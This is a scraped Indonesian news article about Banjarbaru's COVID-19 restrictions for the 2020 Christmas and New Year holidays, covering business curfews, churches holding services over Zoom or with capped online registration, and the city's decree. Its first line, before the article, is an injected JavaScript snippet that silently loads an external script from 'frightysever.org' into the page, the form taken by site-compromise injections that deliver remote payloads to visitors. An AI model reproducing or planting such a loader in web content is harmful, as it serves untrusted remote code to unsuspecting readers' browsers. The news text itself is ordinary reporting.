(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kota Banjarbaru

Ibadah Natal di Gereja Pakai Zoom Meeting, Berikut Maklumat Libur Nataru di Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Selama libur Natal dan Tahun Baru (Nataru) 2021, Pemerintah Kota (Pemko) Banjarbaru membatasi kegiatan masyarakat di kawasan area publik. Kebijakan ini dituangkan dalam maklumat guna mencegah ledakan kasus baru Covid-19.

Berbagai tempat hiburan umum baik itu karaoke, bioskop, cafe, dan tempat wisata, wajib menghentikan aktivitas maksimal pukul 18.00 Wita, selama berlangsungnya libur Nataru. Pun, berlaku juga untuk tempat makan dan restoran yang wajib menghentikan operasional pada pukul 20.00 Wita.

Untuk pelaksanaan Natal 25 Desember nanti, Pemko Banjarbaru telah melakukan koordinasi di seluruh gereja. Yang mana, ada sejumlah gereja yang melaksanakan perayaan natal melalui aplikasi zoom meeting.

“Tapi ada beberapa juga gereja yang memang melaksanakan ibadah natal. Nah, ini kita telah sepakati bersama, kalau yang menggelar ibadah di gereja harus mematuhi protokol kesehatan,” kata Dandim 1006 Martapura Letkol Arm Siswo Budiarto, Rabu (23/12/2020) pagi.

 

 

Selain menerapkan protokol kesehatan, Letkol Arm Siswo yang juga menjabat sebagai Wakil Ketua 1 Satgas Covid-19 Banjarbaru, menyampaikan adanya pembatasan jumlah jemaat yang mengikuti ibadah natal di gereja. Caranya, melalui mekanisme pendaftaran secara online.

“Jadi, pihak gereja yang melaksanakan ibadah sudah mengelola akses pendaftaran jemaat. Tujuannya untuk memantau sekaligus membatasi jumlah jemaat yang hadir. Kami sangat mengapresiasi atas turut serta dukungan saudara-saudara kita kaum nasrani,” terang Dandim.

Di sisi lain, Kapolres Banjarbaru AKBP Doni Hadi Santoso, menegaskan bahwa selama masa libur Nataru, pihaknya akan melakukan monitoring di setiap permukiman rumah warga. Tujuannya, demi mencegah terjadinya kerumunan, khususnya saat merayakan pergantian tahun.

“Kita menyadari bahwa setiap malam pergantian tahun, ada kelompok masyarakat yang merayakannya dengan menggelar kegiatan. Nah, kalau kegiatan ini memunculkan kerumunan maka kita bubarkan. Intinya, jika ada masyarakat yang melanggar kebijakan ini, kita akan memberikan tindakan tegas terukur,” bebernya.

Sementara itu, Kepala Kejari Banjarbaru Andri Irawan mengimbau agar selama libur Nataru dapat dilakukan dengan kegiatan bermanfaat. Terkhusus, bercengkraman dengan masing-masing keluarga.

“Mari kita isi libur Nataru ini dengan kegiatan bermanfaat. Seperti halnya quality time bersama keluarga. Tetap di rumah dan hindari kerumunan. Keselamatan masyarakat di tengah kondisi pandemi saat ini, menjadi prioritas utama,” terangnya.

 

Adapun isi maklumat selama berlangsung masa libur Nataru di Banjarbaru :

1. Pembatasan kegiatan masyarakat di area publik saat libur Natal 2020 dan
Tahun Baru 2021.

2. Meminta masyarakat mengutamakan aktivitas di rumah selama masa
libur dan senantiasa menerapkan protokol kesehatan (3M) dalam setiap aktivitas.

3. Menghindari kerumunan dan kegiatan yang melibatkan banyak orang.

4. Pembatasan kegiatan di area publik

5. Tidak diperkenankan melakukan kegiatan mengumpulkan orang banyak
berupa pesta dengan membakar petasan atau kembang api baik outdoor
dan indoor (di Hotel, Cafe, Resto, Penginapan, Mall dan sebagainya).

6. Setiap orang dan pengelola tempathiburan umum/pengelola usaha yang
melanggar akan diberi sanksi sesuai ketentuan yang berlaku. (kanalkalimantan.com/rico)

Reporter : Rico
Editor : Bie

 


Al Ghifari

Recent Posts

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

10 menit ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

2 jam ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

3 jam ago

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

4 jam ago

Hadiri HUT ke-44 Dekranas, Ini Kata Ketua Dekranasda HSU

KANALKALIMANTAN.COM, SOLO - Ketua Dewan Kerajinan Nasional Daerah (Dekranasda) Hulu Sungai Utara (HSU) Gusti Elvira… Read More

4 jam ago

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

6 jam ago

This website uses cookies.